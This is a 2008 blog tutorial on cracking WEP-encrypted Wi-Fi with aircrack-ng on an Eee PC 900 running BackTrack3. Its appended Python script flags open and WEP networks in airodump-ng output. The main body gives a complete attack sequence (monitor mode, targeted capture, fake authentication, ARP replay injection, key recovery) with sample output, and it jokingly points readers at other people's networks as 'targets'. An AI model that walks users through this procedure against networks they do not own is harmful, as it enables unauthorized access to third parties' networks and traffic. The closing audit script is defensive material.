Saturday 24 November 2012

aircrack-ng On Eee PC 900 Guide

16 May 2008 by George Hafiz
If you now own a shiny new Asus Eee PC 900 and are interested in a little bit of educational WEP encryption cracking, then you will be grateful to hear that I've written a guide just for you :) Strictly speaking, I wrote this 3 years ago for myself and my rt8180 chipset wireless card so that I'd not forget how to do it, but either way, I've modified it to be perfect for us Eee PC 900 owners!
If you haven't done so already, you're going to need to download and install BackTrack3 onto a USB stick (or burn it to a CD and use a USB disc drive, although I strongly suggest you use a memory stick).

To do so, you'll need to go to the Remote-Exploit.org Download Page and get the USB version (or the CD one if you actually want to). Pick any mirror, or use a torrent if you're feeling adventurous.

In the RAR, two directories deep, you'll find two folders, one called 'boot' and the other called 'BT3'. Follow the instructions in INSTALL.txt if you are in Linux. On Windows, go into 'boot' via CMD.exe and execute 'bootinst.bat'. Follow the prompts.

Now, you should have a bootable USB stick. Pull it out of your PC and stick it in your Eee PC. Put it in the USB socket on the LEFT side; this seems to be the only one I can boot from with mine. Turn on your Eee PC. When you see the GUI POST (when it says Press F2 for setup etc.) press 'esc' and you will be presented with a few places to boot from.

Choose your USB device. Mine's called a Sandisk Cruzer, 'cause I have a Sandisk Cruzer USB stick. Think similarly for your own USB stick ;). You will be presented with a list. Just choose the first one, and after a minute it will say 'you have an odd display' or something similar. Just hit space to shut it up. After a while, it will come up with a Desktop.

Now, open up a terminal window with Ctrl+Alt+T. Right click in the black area and open another session, twice, so that you now have 3 sessions open in tabs. In the first one, run:

airmon-ng start wifi0

This will report that the interface ath1 has been put in monitor mode. From now on, that's the interface you will use. Now, in the same session, enter:

airodump-ng ath1

Now, you will see a list of any APs in the area, with information such as cipher, authentication type etc. The only thing I'm going to show you how to crack here is cipher WEP, and authentication OPN. Anything else requires a much more detailed review, and is more complicated.
Good, once you've found the AP you want to target, press Ctrl+C to stop airodump-ng, and run:

airodump-ng -c [channel] --bssid [AP MAC] -w [filename] ath1

To break down what's done here: [channel] should be the channel of the target AP, [AP MAC] should be the MAC address (BSSID) of the target, and [filename] can be any name you like; make it something you'll recognise, for example if the target was called 'linksys' then make the filename 'linksys1'. Keep it short and simple. Next, we're going to associate with the AP so we can inject packets and speed up airodump-ng's data capture. In the second session we opened earlier, run:

aireplay-ng --fakeauth 0 -e [AP SSID] -a [AP MAC] ath1

Cool, now you should get something like:

18:18:20  Sending Authentication Request
18:18:20  Authentication successful
18:18:20  Sending Association Request
18:18:20  Association successful :-)

Nice, if you get this, you're sorted! If you don't, you probably have a picky target, or they are using MAC address filtering. Try this for picky APs:

aireplay-ng --fakeauth 6000 -o 1 -q 10 -e [AP SSID] -a [AP MAC] ath1

If you see this:

18:22:32  Sending Authentication Request
18:22:32  Authentication successful
18:22:32  Sending Association Request
18:22:32  Association successful :-)
18:22:42  Sending keep-alive packet
18:22:52  Sending keep-alive packet

Then hooray, you've done it =). Else, give up, and find another target, I mean, change YOUR router settings...
Now it's time to start injecting. I hope you're not afraid of needles:

aireplay-ng -3 -b [AP MAC] ath1 -x 250

It will sit and wait for an ARP ack or request now. If you happen to have a BTHomeHub, then this shouldn't take long, even if there are no active clients on the AP. Once it gets an ARP, numbers will start going crazy, so you know it's working. Go to session one and watch the data column number rise dramatically.
Right, now we play the waiting game. Wait until the data number is about 40,000. Then start crackin'! In the third session, enter:

aircrack-ng -z -b [AP MAC] [filename]*.cap

Don't forget to enter your filename; in our example, linksys1*.cap. It will start working on it and display the WEP key when finished. As a footnote, remember that whenever you are entering the SSID (the name of the network), it is case sensitive, so BTHomeHub-FE1D will NEED you to enter the capitals there, otherwise you won't be able to associate.
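The same airodump-ng listing is what a network owner would look at to audit their own premises for WEP or open access points, which is the real lesson of this guide. The following is an added Python example, not code from the original post: it reads the prefix-01.csv that airodump-ng writes beside the .cap when run with -w (the column layout is assumed from the aircrack-ng documentation) and flags every open or WEP network; the capture below is constructed, not real.

```python
import csv
import io

# Column layout of the access-point table in airodump-ng's prefix-01.csv (written
# with -w). Assumed from the aircrack-ng documentation; adjust if your version differs.
AP_FIELDS = ["BSSID", "First time seen", "Last time seen", "channel", "Speed",
             "Privacy", "Cipher", "Authentication", "Power", "# beacons",
             "# IV", "LAN IP", "ID-length", "ESSID", "Key"]

# Constructed sample (not a real capture): one WEP/OPN router, one WPA2 router.
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:11:22:33:44:55, 2008-05-16 18:18:20, 2008-05-16 18:40:01,  6,  54, WEP, WEP, OPN, -45, 320, 41250,   0.  0.  0.  0,   8, linksys1,
66:77:88:99:AA:BB, 2008-05-16 18:18:21, 2008-05-16 18:40:01, 11,  54, WPA2, CCMP, PSK, -60, 300, 0,   0.  0.  0.  0,  14, BTHomeHub-FE1D,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
"""

def parse_access_points(text):
    """Return the AP rows of an airodump-ng CSV as dicts keyed by AP_FIELDS."""
    aps = []
    for row in csv.reader(io.StringIO(text), skipinitialspace=True):
        if not row:                 # blank line ends the AP table once rows exist
            if aps:
                break
            continue
        first = row[0].strip()
        if first == "BSSID":        # AP table header
            continue
        if first == "Station MAC":  # client table starts here
            break
        aps.append(dict(zip(AP_FIELDS, (c.strip() for c in row))))
    return aps

def weak_access_points(aps, iv_threshold=40000):
    """Flag open and WEP networks. A WEP network is also marked when the capture
    already holds iv_threshold data frames (the ~40,000 the guide waits for)."""
    findings = []
    for ap in aps:
        privacy = ap["Privacy"].upper()
        reasons = []
        if privacy in ("", "OPN"):
            reasons.append("no encryption")
        elif "WEP" in privacy:
            reasons.append("WEP cipher: key is recoverable from traffic, replace with WPA2")
            if int(ap["# IV"] or 0) >= iv_threshold:
                reasons.append("%s data frames captured, at or past the %d mark" % (ap["# IV"], iv_threshold))
        if reasons:
            findings.append((ap["BSSID"], ap["ESSID"], reasons))
    return findings
```

Run it against your own prefix-01.csv and anything it returns is a router that needs its settings changed.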
Happy educating ;0